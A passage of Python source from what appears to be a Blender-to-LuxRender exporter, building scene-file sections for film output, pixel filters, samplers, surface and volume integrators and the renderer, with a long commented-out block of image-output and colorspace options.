                    str += "\n \"integer xresolution\" [%d] \n \"integer yresolution\" [%d]"%(xr, yr)
            # if gui: gui.newline(" Halt:")
            # str += luxInt("haltspp", luxProp(scn, "haltspp", 0), 0, 32768, "haltspp", "Stop rendering after specified amount of samples per pixel / 0 = never halt", gui)
            # palpha = luxProp(scn, "film.premultiplyalpha", "false")
            # str += luxBool("premultiplyalpha", palpha, "premultiplyalpha", "Pre multiply film alpha channel during normalization", gui)
            # if gui: gui.newline(" Display:")
            # str += luxInt("displayinterval", luxProp(scn, "film.displayinterval", 12), 4, 3600, "interval", "Set display Interval (seconds)", gui)
            # if gui: gui.newline(" Write:")
            # str += luxInt("writeinterval", luxProp(scn, "film.writeinterval", 120), 12, 3600, "interval", "Set display Interval (seconds)", gui)
            # Image File Outputs
            # LDR clamping method
            # if gui: gui.newline(" Clamping:")
            # ldrclampmethod = luxProp(scn, "film.ldr_clamp_method", "lum")
            # str += luxOption("ldr_clamp_method", ldrclampmethod, ["lum", "hue", "cut"], "LDR clamping", "Method to clamp high luminance values for LDR output", gui, 0.5)
            # if gui: gui.newline()
            # OpenEXR Output
            # saveexr = luxProp(scn, "film.write_exr", "false")
            # str += luxCollapse("write_exr", saveexr, "OpenEXR Output", "Enable OpenEXR output", gui, 2.0)
            # if saveexr.get() == "true":
            #     if gui: gui.newline(" OpenEXR:")
            #
            #     exrchannels = luxProp(scn, "film.write_exr_channels", "RGBA")
            #     str += luxOption("write_exr_channels", exrchannels, ["Y", "YA", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
            #     exrres = luxProp(scn, "film.write_exr_halftype", "true")
            #     str += luxBool("write_exr_halftype", exrres, "16bit Half", "Enable 16bit Half resolution output, otherwise 32bit float", gui, 0.5)
            #     exrcompression = luxProp(scn, "film.write_exr_compression", "PIZ (lossless)")
            #     str += luxOption("write_exr_compressiontype", exrcompression, ["RLE (lossless)", "PIZ (lossless)", "ZIP (lossless)", "Pxr24 (lossy)", "None"], "Compression", "Select OpenEXR Compression algorithm to use", gui, 1.0)
            #
            #     exrimaging = luxProp(scn, "film.write_exr_imaging", "true")
            #     str += luxBool("write_exr_applyimaging", exrimaging, "Apply Imaging/Tonemapping", "Apply Imaging and Tonemapping pipeline", gui, 1.2)
            #
            #     if exrimaging.get()=="true":
            #         exrgamutclamp = luxProp(scn, "film.write_exr_gamutclamp", "true")
            #         str += luxBool("write_exr_gamutclamp", exrgamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 0.8)
            #
            #     if gui: gui.newline()
            #     # Zbuf output
            #     exrZ = luxProp(scn, "film.write_exr_Z", "true")
            #     str += luxBool("write_exr_ZBuf", exrZ, "ZBuf", "Enable Z Depth Buffer channel", gui, 0.8)
            #     if exrZ.get() == "true":
            #         exrZNormalize = luxProp(scn, "film.write_exr_ZNorm", "None")
            #         str += luxOption("write_exr_zbuf_normalizationtype", exrZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
            # PNG Output
            # savepng = luxProp(scn, "film.write_png", "true")
            # str += luxCollapse("write_png", savepng, "PNG Output", "Enable PNG (Portable Network Graphics) output", gui, 2.0)
            #
            # if savepng.get() == "true":
            #     if gui: gui.newline(" PNG:")
            #     pngchannels = luxProp(scn, "film.write_png_channels", "RGB")
            #     str += luxOption("write_png_channels", pngchannels, ["Y", "YA", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
            #     png16bit = luxProp(scn, "film.write_png_16bit", "false")
            #     str += luxBool("write_png_16bit", png16bit, "16bit", "Enable 16bits per channel resolution PNG output", gui, 0.5)
            #     pnggamutclamp = luxProp(scn, "film.write_png_gamutclamp", "true")
            #     str += luxBool("write_png_gamutclamp", pnggamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 1.0)
            # Zbuf output
            #pngZ = luxProp(scn, "film.write_png_ZBuf", "false")
            #str += luxBool("write_png_ZBuf", pngZ, "ZBuf (Separate)", "Enable Z Depth Buffer channel", gui, 0.8)
            #if pngZ.get() == "true":
            #    pngZNormalize = luxProp(scn, "film.write_png_ZNorm", "Min/Max")
            #    str += luxOption("write_png_zbuf_normalizationtype", pngZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
            # TGA Output
            # savetga = luxProp(scn, "film.write_tga", "false")
            # str += luxCollapse("write_tga", savetga, "TGA Output", "Enable TGA output", gui, 2.0)
            #
            # if savetga.get() == "true":
            #     if gui: gui.newline(" TGA:")
            #     tgachannels = luxProp(scn, "film.write_tga_channels", "RGB")
            #     str += luxOption("write_tga_channels", tgachannels, ["Y", "RGB", "RGBA"], "Channels", "Select channels type to write", gui, 0.5)
            #     tgagamutclamp = luxProp(scn, "film.write_tga_gamutclamp", "true")
            #     str += luxBool("write_tga_gamutclamp", tgagamutclamp, "Gamut Clamp", "Clamp out of gamut (bright) pixel values", gui, 1.5)
            # Zbuf output
            #tgaZ = luxProp(scn, "film.write_tga_ZBuf", "false")
            #str += luxBool("write_tga_ZBuf", tgaZ, "ZBuf (Separate)", "Enable Z Depth Buffer channel", gui, 0.8)
            #if tgaZ.get() == "true":
            #    tgaZNormalize = luxProp(scn, "film.write_tga_ZNorm", "Min/Max")
            #    str += luxOption("write_tga_zbuf_normalizationtype", tgaZNormalize, ["Camera Start/End clip", "Min/Max", "None"], "ZBuf Normalization", "Select type of normalization to use for Zbuf Depth Map", gui, 1.2)
            # override output image dir in case of command line batch mode
            overrideop = luxProp(scn, "overrideoutputpath", "")
            if overrideop.get() != "":
                # derive the output name from the .blend file name + frame number
                filebase = os.path.splitext(os.path.basename(Blender.Get('filename')))[0]
                filename = overrideop.get() + "/" + filebase + "-%05d" % (Blender.Get('curframe'))
                str += "\n \"string filename\" [\"%s\"]"%(filename)
            else:
                fn = luxProp(scn, "filename", "default-%05d" % (Blender.Get('curframe')))
                str += luxString("filename", fn, "File name", "save file name", None)
            # if gui: gui.newline(" Resume:")
            # resumeflm = luxProp(scn, "film.write_resume_flm", "false")
            # str += luxBool("write_resume_flm", resumeflm, "Write/Use FLM", "Write a resume fleximage .flm file, or resume rendering if it already exists", gui)
            # restartflm = luxProp(scn, "film.restart_resume_flm", "true")
            # str += luxBool("restart_resume_flm", restartflm, "Restart/Erase", "Restart with a black flm, even it a previous flm exists", gui)
            # if gui: gui.newline(" Reject:")
            # str += luxInt("reject_warmup", luxProp(scn, "film.reject_warmup", 128), 0, 32768, "warmup_spp", "Specify amount of samples per pixel for high intensity rejection", gui)
            # debugmode = luxProp(scn, "film.debug", "false")
            # str += luxBool("debug", debugmode, "debug", "Turn on debug reporting and switch off reject", gui)
            # Colorspace
            # if gui: gui.newline(" Colorspace:")
            #
            # cspaceusepreset = luxProp(scn, "film.colorspaceusepreset", "true")
            # luxBool("colorspaceusepreset", cspaceusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
            #
            # # Default values for 'sRGB - HDTV (ITU-R BT.709-5)'
            # cspacewhiteX = luxProp(scn, "film.cspacewhiteX", 0.314275)
            # cspacewhiteY = luxProp(scn, "film.cspacewhiteY", 0.329411)
            # cspaceredX = luxProp(scn, "film.cspaceredX", 0.63)
            # cspaceredY = luxProp(scn, "film.cspaceredY", 0.34)
            # cspacegreenX = luxProp(scn, "film.cspacegreenX", 0.31)
            # cspacegreenY = luxProp(scn, "film.cspacegreenY", 0.595)
            # cspaceblueX = luxProp(scn, "film.cspaceblueX", 0.155)
            # cspaceblueY = luxProp(scn, "film.cspaceblueY", 0.07)
            # gamma = luxProp(scn, "film.gamma", 2.2)
            #
            # if(cspaceusepreset.get() == "true"):
            #     # preset controls
            #     cspace = luxProp(scn, "film.colorspace", "sRGB - HDTV (ITU-R BT.709-5)")
            #     cspaces = ["sRGB - HDTV (ITU-R BT.709-5)", "ROMM RGB", "Adobe RGB 98", "Apple RGB", "NTSC (FCC 1953, ITU-R BT.470-2 System M)", "NTSC (1979) (SMPTE C, SMPTE-RP 145)", "PAL/SECAM (EBU 3213, ITU-R BT.470-6)", "CIE (1931) E"]
            #     luxOption("colorspace", cspace, cspaces, "Colorspace", "select output working colorspace", gui, 1.6)
            #
            #     if cspace.get()=="ROMM RGB":
            #         cspacewhiteX.set(0.346); cspacewhiteY.set(0.359) # D50
            #         cspaceredX.set(0.7347); cspaceredY.set(0.2653)
            #         cspacegreenX.set(0.1596); cspacegreenY.set(0.8404)
            #         cspaceblueX.set(0.0366); cspaceblueY.set(0.0001)
            #     elif cspace.get()=="Adobe RGB 98":
            #         cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
            #         cspaceredX.set(0.64); cspaceredY.set(0.34)
            #         cspacegreenX.set(0.21); cspacegreenY.set(0.71)
            #         cspaceblueX.set(0.15); cspaceblueY.set(0.06)
            #     elif cspace.get()=="Apple RGB":
            #         cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
            #         cspaceredX.set(0.625); cspaceredY.set(0.34)
            #         cspacegreenX.set(0.28); cspacegreenY.set(0.595)
            #         cspaceblueX.set(0.155); cspaceblueY.set(0.07)
            #     elif cspace.get()=="NTSC (FCC 1953, ITU-R BT.470-2 System M)":
            #         cspacewhiteX.set(0.310); cspacewhiteY.set(0.316) # C
            #         cspaceredX.set(0.67); cspaceredY.set(0.33)
            #         cspacegreenX.set(0.21); cspacegreenY.set(0.71)
            #         cspaceblueX.set(0.14); cspaceblueY.set(0.08)
            #     elif cspace.get()=="NTSC (1979) (SMPTE C, SMPTE-RP 145)":
            #         cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
            #         cspaceredX.set(0.63); cspaceredY.set(0.34)
            #         cspacegreenX.set(0.31); cspacegreenY.set(0.595)
            #         cspaceblueX.set(0.155); cspaceblueY.set(0.07)
            #     elif cspace.get()=="PAL/SECAM (EBU 3213, ITU-R BT.470-6)":
            #         cspacewhiteX.set(0.313); cspacewhiteY.set(0.329) # D65
            #         cspaceredX.set(0.64); cspaceredY.set(0.33)
            #         cspacegreenX.set(0.29); cspacegreenY.set(0.60)
            #         cspaceblueX.set(0.15); cspaceblueY.set(0.06)
            #     elif cspace.get()=="CIE (1931) E":
            #         cspacewhiteX.set(0.333); cspacewhiteY.set(0.333) # E
            #         cspaceredX.set(0.7347); cspaceredY.set(0.2653)
            #         cspacegreenX.set(0.2738); cspacegreenY.set(0.7174)
            #         cspaceblueX.set(0.1666); cspaceblueY.set(0.0089)
            #
            #     whitepointusecspace = luxProp(scn, "film.whitepointusecolorspace", "true")
            #     luxBool("whitepointusecolorspace", whitepointusecspace, "Colorspace Whitepoint", "Use default whitepoint for selected colorspace", gui, 1.0)
            #     gammausecspace = luxProp(scn, "film.gammausecolorspace", "true")
            #     luxBool("gammausecolorspace", gammausecspace, "Colorspace Gamma", "Use default output gamma for selected colorspace", gui, 1.0)
            #
            #     if(whitepointusecspace.get() == "false"):
            #         if gui: gui.newline(" Whitepoint:")
            #         whitepointusepreset = luxProp(scn, "film.whitepointusepreset", "true")
            #         luxBool("whitepointusepreset", whitepointusepreset, "Preset", "Select from a list of predefined presets", gui, 0.4)
            #
            #         if(whitepointusepreset.get() == "true"):
            #             whitepointpresets = ["E", "D50", "D55", "D65", "D75", "A", "B", "C", "9300", "F2", "F7", "F11"]
            #             whitepointpreset = luxProp(scn, "film.whitepointpreset", "D65")
            #             luxOption("whitepointpreset", whitepointpreset, whitepointpresets, " PRESET", "select Whitepoint preset", gui, 1.6)
            #
            #             if whitepointpreset.get()=="E": cspacewhiteX.set(0.333); cspacewhiteY.set(0.333)
            #             elif whitepointpreset.get()=="D50": cspacewhiteX.set(0.346); cspacewhiteY.set(0.359)
            #             elif whitepointpreset.get()=="D55": cspacewhiteX.set(0.332); cspacewhiteY.set(0.347)
            #             elif whitepointpreset.get()=="D65": cspacewhiteX.set(0.313); cspacewhiteY.set(0.329)
            #             elif whitepointpreset.get()=="D75": cspacewhiteX.set(0.299); cspacewhiteY.set(0.315)
            #             elif whitepointpreset.get()=="A": cspacewhiteX.set(0.448); cspacewhiteY.set(0.407)
            #             elif whitepointpreset.get()=="B": cspacewhiteX.set(0.348); cspacewhiteY.set(0.352)
            #             elif whitepointpreset.get()=="C": cspacewhiteX.set(0.310); cspacewhiteY.set(0.316)
            #             elif whitepointpreset.get()=="9300": cspacewhiteX.set(0.285); cspacewhiteY.set(0.293)
            #             elif whitepointpreset.get()=="F2": cspacewhiteX.set(0.372); cspacewhiteY.set(0.375)
            #             elif whitepointpreset.get()=="F7": cspacewhiteX.set(0.313); cspacewhiteY.set(0.329)
            #             elif whitepointpreset.get()=="F11": cspacewhiteX.set(0.381); cspacewhiteY.set(0.377)
            #         else:
            #             luxFloat("white X", cspacewhiteX, 0.0, 1.0, "white X", "Whitepoint X weight", gui, 0.8)
            #             luxFloat("white Y", cspacewhiteY, 0.0, 1.0, "white Y", "Whitepoint Y weight", gui, 0.8)
            #
            #     if(gammausecspace.get() == "false"):
            #         if gui: gui.newline(" Gamma:")
            #         luxFloat("gamma", gamma, 0.1, 6.0, "gamma", "Output and RGC Gamma", gui, 2.0)
            # else:
            #     # manual controls
            #     luxFloat("white X", cspacewhiteX, 0.0, 1.0, "white X", "Whitepoint X weight", gui, 0.8)
            #     luxFloat("white Y", cspacewhiteY, 0.0, 1.0, "white Y", "Whitepoint Y weight", gui, 0.8)
            #     luxFloat("red X", cspaceredX, 0.0, 1.0, "red X", "Red component X weight", gui, 1.0)
            #     luxFloat("red Y", cspaceredY, 0.0, 1.0, "red Y", "Red component Y weight", gui, 1.0)
            #     luxFloat("green X", cspacegreenX, 0.0, 1.0, "green X", "Green component X weight", gui, 1.0)
            #     luxFloat("green Y", cspacegreenY, 0.0, 1.0, "green Y", "Green component Y weight", gui, 1.0)
            #     luxFloat("blue X", cspaceblueX, 0.0, 1.0, "blue X", "Blue component X weight", gui, 1.0)
            #     luxFloat("blue Y", cspaceblueY, 0.0, 1.0, "blue Y", "Blue component Y weight", gui, 1.0)
            #     if gui: gui.newline(" Gamma:")
            #     luxFloat("gamma", gamma, 0.1, 6.0, "gamma", "Output and RGC Gamma", gui, 2.0)
            #
            # str += "\n \"float colorspace_white\" [%f %f]"%(cspacewhiteX.get(), cspacewhiteY.get())
            # str += "\n \"float colorspace_red\" [%f %f]"%(cspaceredX.get(), cspaceredY.get())
            # str += "\n \"float colorspace_green\" [%f %f]"%(cspacegreenX.get(), cspacegreenY.get())
            # str += "\n \"float colorspace_blue\" [%f %f]"%(cspaceblueX.get(), cspaceblueY.get())
            # str += "\n \"float gamma\" [%f]"%(gamma.get())
    return str
def luxPixelFilter(scn, gui=None):
	"""Build the "PixelFilter" section of the exported scene file.

	Draws the pixel-filter UI (when gui is given) and collects the
	parameters of the selected filter type (box / gaussian / mitchell /
	sinc / triangle) into the export string.

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object; when None only the string is built.
	Returns the parameter string to append to the scene file.
	"""
	global icon_c_filter
	str = ""
	if scn:
		filtertype = luxProp(scn, "pixelfilter.type", "mitchell")
		str = luxIdentifier("PixelFilter", filtertype, ["box", "gaussian", "mitchell", "sinc", "triangle"], "FILTER", "select pixel filter type", gui, icon_c_filter)
		# Advanced toggle (defaults to the scene-wide "parammodeadvanced" setting)
		parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
		showadvanced = luxProp(scn, "pixelfilter.showadvanced", parammodeadvanced.get())
		luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
		# Help toggle
		showhelp = luxProp(scn, "pixelfilter.showhelp", "false")
		luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
		if filtertype.get() == "box":
			if showadvanced.get()=="true":
				# Advanced parameters
				if gui: gui.newline()
				str += luxFloat("xwidth", luxProp(scn, "pixelfilter.box.xwidth", 0.5), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
				str += luxFloat("ywidth", luxProp(scn, "pixelfilter.box.ywidth", 0.5), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
		if filtertype.get() == "gaussian":
			if showadvanced.get()=="true":
				# Advanced parameters
				if gui: gui.newline()
				str += luxFloat("xwidth", luxProp(scn, "pixelfilter.gaussian.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
				str += luxFloat("ywidth", luxProp(scn, "pixelfilter.gaussian.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
				if gui: gui.newline()
				str += luxFloat("alpha", luxProp(scn, "pixelfilter.gaussian.alpha", 2.0), 0.0, 10.0, "alpha", "Gaussian rate of falloff. Lower values give blurrier images", gui)
		if filtertype.get() == "mitchell":
			if showadvanced.get()=="false":
				# Default parameters: a single "sharpness" slider mapped onto B/C
				if gui: gui.newline("", 8, 0, None, [0.4,0.4,0.4])
				slidval = luxProp(scn, "pixelfilter.mitchell.sharp", 0.25)
				luxFloat("sharpness", slidval, 0.0, 1.0, "sharpness", "Specify amount between blurred (left) and sharp/ringed (right)", gui, 2.0, 1)
				# rule: B + 2*c = 1.0
				C = slidval.getFloat() * 0.5
				B = 1.0 - slidval.getFloat()
				str += "\n   \"float B\" [%f]"%(B)
				str += "\n   \"float C\" [%f]"%(C)
			if showadvanced.get()=="true":
				# Advanced parameters
				if gui: gui.newline()
				str += luxFloat("xwidth", luxProp(scn, "pixelfilter.mitchell.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
				str += luxFloat("ywidth", luxProp(scn, "pixelfilter.mitchell.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
				if gui: gui.newline()
				optmode = luxProp(scn, "pixelfilter.mitchell.optmode", "slider")
				luxOption("optmode", optmode, ["slider", "preset", "manual"], "Mode", "Mode of configuration", gui, 0.5)
				if(optmode.get() == "slider"):
					slidval = luxProp(scn, "pixelfilter.mitchell.sharp", 0.33)
					luxFloat("sharpness", slidval, 0.0, 1.0, "sharpness", "Specify amount between blurred (left) and sharp/ringed (right)", gui, 1.5, 1)
					# rule: B + 2*c = 1.0
					C = slidval.getFloat() * 0.5
					B = 1.0 - slidval.getFloat()
					str += "\n   \"float B\" [%f]"%(B)
					str += "\n   \"float C\" [%f]"%(C)
				elif(optmode.get() == "preset"):
					# NOTE(review): "preset" mode emits no B/C parameters at all
					print("not implemented")
				else:
					str += luxFloat("B", luxProp(scn, "pixelfilter.mitchell.B", 0.3333), 0.0, 1.0, "B", "Specify the shape of the Mitchell filter. Often best result is when B + 2C = 1", gui, 0.75)
					str += luxFloat("C", luxProp(scn, "pixelfilter.mitchell.C", 0.3333), 0.0, 1.0, "C", "Specify the shape of the Mitchell filter. Often best result is when B + 2C = 1", gui, 0.75)
		if filtertype.get() == "sinc":
			if showadvanced.get()=="true":
				# Advanced parameters
				if gui: gui.newline()
				str += luxFloat("xwidth", luxProp(scn, "pixelfilter.sinc.xwidth", 4.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
				str += luxFloat("ywidth", luxProp(scn, "pixelfilter.sinc.ywidth", 4.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
				if gui: gui.newline()
				str += luxFloat("tau", luxProp(scn, "pixelfilter.sinc.tau", 3.0), 0.0, 10.0, "tau", "Permitted number of cycles of the sinc function before it is clamped to zero", gui)
		if filtertype.get() == "triangle":
			if showadvanced.get()=="true":
				# Advanced parameters
				if gui: gui.newline()
				str += luxFloat("xwidth", luxProp(scn, "pixelfilter.triangle.xwidth", 2.0), 0.0, 10.0, "x-width", "Width of the filter in the x direction", gui)
				str += luxFloat("ywidth", luxProp(scn, "pixelfilter.triangle.ywidth", 2.0), 0.0, 10.0, "y-width", "Width of the filter in the y direction", gui)
	return str
def luxSampler(scn, gui=None):
	"""Draw the sampler UI and build the "Sampler" export section.

	scn: Blender scene holding the lux properties (may be None).
	gui: optional gui layout object; pass None to only build the string.
	Returns the parameter string to append to the scene file.
	"""
	global icon_c_sampler, icon_help
	out = ""
	if scn:
		samplertype = luxProp(scn, "sampler.type", "lowdiscrepancy")
		out = luxIdentifier("Sampler", samplertype, ["lowdiscrepancy", "random"], "SAMPLER", "select sampler type", gui, icon_c_sampler)
		# The advanced/help toggles only affect the UI, never the export string.
		parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
		showadvanced = luxProp(scn, "sampler.showadvanced", parammodeadvanced.get())
		luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
		showhelp = luxProp(scn, "sampler.showhelp", "false")
		luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
		chosen = samplertype.get()
		if chosen == "lowdiscrepancy":
			if gui: gui.newline("  PixelSampler:")
			out += luxInt("pixelsamples", luxProp(scn, "sampler.lowdisc.pixelsamples", 4), 1, 2048, "samples", "Average number of samples taken per pixel. More samples create a higher quality image at the cost of render time", gui)
		elif chosen == "random":
			if gui: gui.newline("  PixelSampler:")
			out += luxInt("pixelsamples", luxProp(scn, "sampler.random.pixelsamples", 4), 1, 512, "pixelsamples", "Allows you to specify how many samples per pixel are computed", gui)
	return out
def luxSurfaceIntegrator(scn, gui=None):
	"""Build the "SurfaceIntegrator" section of the exported scene file.

	Draws the surface-integrator UI (when gui is given) and collects the
	parameters of the selected integrator (directlighting / path /
	photonmap / irradiancecache / igi / dipolesubsurface).

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object; when None only the string is built.
	Returns the parameter string to append to the scene file.
	"""
	global icon_c_integrator
	str = ""
	if scn:
		integratortype = luxProp(scn, "sintegrator.type", "directlighting")
		str = luxIdentifier("SurfaceIntegrator", integratortype, ["directlighting", "path", "photonmap", "irradiancecache", "igi", "dipolesubsurface" ], "INTEGRATOR", "select surface integrator type", gui, icon_c_integrator)
		# Advanced toggle (defaults to the scene-wide "parammodeadvanced" setting)
		parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
		showadvanced = luxProp(scn, "sintegrator.showadvanced", parammodeadvanced.get())
		luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
		# Help toggle
		showhelp = luxProp(scn, "sintegrator.showhelp", "false")
		luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
		if integratortype.get() == "directlighting":
			# Default parameters
			if gui: gui.newline("  Depth:", 8, 0, None, [0.4,0.4,0.4])
			str += luxInt("maxdepth", luxProp(scn, "sintegrator.dlighting.maxdepth", 8), 0, 2048, "bounces", "The maximum recursion depth for ray casting", gui, 2.0)
		if integratortype.get() == "path":
			# Default parameters
			if gui: gui.newline("  Depth:", 8, 0, None, [0.4,0.4,0.4])
			str += luxInt("maxdepth", luxProp(scn, "sintegrator.path.maxdepth", 10), 0, 2048, "bounces", "The maximum recursion depth for ray casting", gui, 1.0)
		if integratortype.get() == "photonmap":
			if gui: gui.newline("  Render:")
			str += luxInt("maxphotondepth", luxProp(scn, "sintegrator.photonmap.maxphotondepth", 10), 1, 1024, "maxphotondepth", "The maximum recursion depth of photon tracing", gui)
			str += luxInt("maxdepth", luxProp(scn, "sintegrator.photonmap.maxdepth", 6), 1, 1024, "maxdepth", "The maximum recursion depth of specular reflection and refraction", gui)
			str += luxFloat("maxdist", luxProp(scn, "sintegrator.photonmap.maxdist", 0.1), 0.0, 10.0, "maxdist", "The maximum distance between a point being shaded and a photon that can contribute to that point", gui)
			str += luxInt("nused", luxProp(scn, "sintegrator.photonmap.nused", 50), 0, 1000000, "nused", "The number of photons to use in density estimation", gui)
			if gui: gui.newline("  Photons:")
			str += luxInt("indirectphotons", luxProp(scn, "sintegrator.photonmap.idphotons", 200000), 0, 10000000, "indirect", "The number of photons to shoot for indirect lighting during preprocessing of the photon map", gui)
			str += luxInt("causticphotons", luxProp(scn, "sintegrator.photonmap.cphotons", 20000), 0, 10000000, "caustic", "The number of photons to shoot for caustics during preprocessing of the photon map", gui)
			if gui: gui.newline("  FinalGather:")
			fg = luxProp(scn, "sintegrator.photonmap.fgather", "true")
			str += luxBool("finalgather", fg, "finalgather", "Enable use of final gather during rendering", gui)
			if fg.get() == "true":
				# Final-gather sub-parameters are only exported when enabled
				str += luxInt("finalgathersamples", luxProp(scn, "sintegrator.photonmap.fgathers", 32), 1, 1024, "samples", "The number of finalgather samples to take per pixel during rendering", gui)
				str += luxFloat("gatherangle", luxProp(scn, "sintegrator.photonmap.gangle", 10.0), 0.0, 360.0, "gatherangle", "Angle for final gather", gui)
		if integratortype.get() == "irradiancecache":
			if gui: gui.newline()
			ns = luxProp(scn, "sintegrator.irrad.nsamples", 2048)
			str += luxInt("nsamples", ns, 1, 16384, "nsamples", "Number of samples to take for estimates", gui)
			if gui: gui.newline()
			sdepth = luxProp(scn, "sintegrator.irrad.maxspeculardepth", 5)
			str += luxInt("maxspeculardepth", sdepth, 1, 32, "maxspeculardepth", "The maximum recursion depth for specular ray casting", gui, 2.0)
			idepth = luxProp(scn, "sintegrator.irrad.maxindirectdepth", 5)
			str += luxInt("maxindirectdepth", idepth, 1, 32, "maxindirectdepth", "The maximum recursion depth for indirect ray casting", gui, 2.0)
			if gui: gui.newline()
			minw = luxProp(scn, "sintegrator.irrad.minweight", 0.5)
			str += luxFloat("minweight", minw, 0., 1., "minweight", "The minimum weight for irradiance samples", gui)
			if gui: gui.newline()
			mins = luxProp(scn, "sintegrator.irrad.minspacing", 2.5)
			str += luxFloat("minpixelspacing", mins, 0., 10., "minpixelspacing", "The minimum pixel spacing between samples", gui, 2.0)
			if gui: gui.newline()
			maxs = luxProp(scn, "sintegrator.irrad.maxspacing", 15.)
			str += luxFloat("maxpixelspacing", maxs, 0., 100., "maxpixelspacing", "The maximum pixel spacing between samples", gui, 2.0)
		if integratortype.get() == "igi":
			if gui: gui.newline("  Depth:", 8, 0, None, [0.4,0.4,0.4])
			depth = luxProp(scn, "sintegrator.igi.maxdepth", 5)
			str += luxInt("maxdepth", depth, 1, 32, "maxdepth", "The maximum recursion depth for ray casting", gui, 2.0)
			if showadvanced.get()=="true":
				# Advanced parameters (virtual lights)
				if gui: gui.newline("  VLights:")
				str += luxInt("nsets", luxProp(scn, "sintegrator.igi.nsets", 4), 1, 100, "nsets", "The number of virtual lights sets", gui)
				str += luxInt("nlights", luxProp(scn, "sintegrator.igi.nlights", 64), 1, 1000, "nlights", "The number of light paths per light set", gui)
				str += luxFloat("mindist", luxProp(scn, "sintegrator.igi.mindist", 0.1), 0.01, 10.0, "mindist", "The minimal distance to a virtual light to take it into account", gui)
		if integratortype.get() == "dipolesubsurface":
			if gui: gui.newline()
			depth = luxProp(scn, "sintegrator.dipole.maxdepth", 5)
			str += luxInt("maxdepth", depth, 1, 32, "maxdepth", "The maximum recursion depth for ray casting", gui, 2.0)
			if gui: gui.newline()
			str += luxFloat("minsampledistance", luxProp(scn, "sintegrator.dipole.mindist", 0.25), 0.001, 100.0, "minsampledistance", "The minimal distance between irradiance samples", gui, 2.0)
			if gui: gui.newline()
			str += luxFloat("maxerror", luxProp(scn, "sintegrator.dipole.maxerror", 0.05), 0.01, 3.0, "maxerror", "The maximum error when computing subsurface scattering", gui)
	return str
def luxVolumeIntegrator(scn, gui=None):
	"""Build the "VolumeIntegrator" section of the exported scene file.

	Draws the volume-integrator UI (when gui is given) and exports the
	stepsize parameter for the selected type ("emission" or "single").

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object; when None only the string is built.
	Returns the parameter string to append to the scene file.
	"""
	global icon_c_volumeintegrator
	str = ""
	if scn:
		integratortype = luxProp(scn, "vintegrator.type", "single")
		str = luxIdentifier("VolumeIntegrator", integratortype, ["emission", "single"], "VOLUME INT", "select volume integrator type", gui, icon_c_volumeintegrator)
		if integratortype.get() == "emission":
			str += luxFloat("stepsize", luxProp(scn, "vintegrator.emission.stepsize", 1.0), 0.0, 100.0, "stepsize", "Stepsize for volumes", gui)
		elif integratortype.get() == "single":
			# BUGFIX: the "single" branch previously reused the
			# "vintegrator.emission.stepsize" property key (copy-paste),
			# so both integrator types silently shared one stored value.
			str += luxFloat("stepsize", luxProp(scn, "vintegrator.single.stepsize", 1.0), 0.0, 100.0, "stepsize", "Stepsize for volumes", gui)
	return str
def luxRenderer(scn, gui=None):
	"""Build the "Renderer" section of the exported scene file.

	Draws the renderer UI (when gui is given); only the "metropolis"
	renderer exports additional parameters.

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object; when None only the string is built.
	Returns the parameter string to append to the scene file.
	"""
	str = ""
	if scn:
		rendtype = luxProp(scn, "renderer.type", "sample")
		str = luxIdentifier("Renderer", rendtype, ["sample", "metropolis" ], "RENDERER", "select renderer type", gui)
		if rendtype.get() == "metropolis":
			# Default parameters
			if gui: gui.newline()
			str += luxInt("samplesperpixel", luxProp(scn, "renderer.metro.samplesperpixel", 64), 0, 100, "samplesperpixel", "Average number of samples per pixel", gui, 2.0)
			if gui: gui.newline()
			str += luxInt("maxdepth", luxProp(scn, "renderer.metro.maxdepth", 6), 1, 32, "maxdepth", "The maximum depth for the path casting", gui, 2.0)
			if gui: gui.newline()
			str += luxBool("indirectonly", luxProp(scn, "renderer.metro.indirectonly", "false"), "indirectonly", "Only compute the indirect illumination", gui)
			if gui: gui.newline()
			ds = luxProp(scn, "renderer.metro.directseparately", "true")
			# NOTE(review): the UI caption "dodirectseperately" is misspelled,
			# but it is a user-visible string so it is left untouched here.
			str += luxBool("dodirectseparately", ds, "dodirectseperately", "Do direct lighting separately", gui)
			if ds.get() == "true":
				str += luxInt("directsamples", luxProp(scn, "renderer.metro.directsamples", 8), 1, 1024, "directsamples", "Samples per pixel for separate direct lighting", gui)
	return str
def luxEnvironment(scn, gui=None):
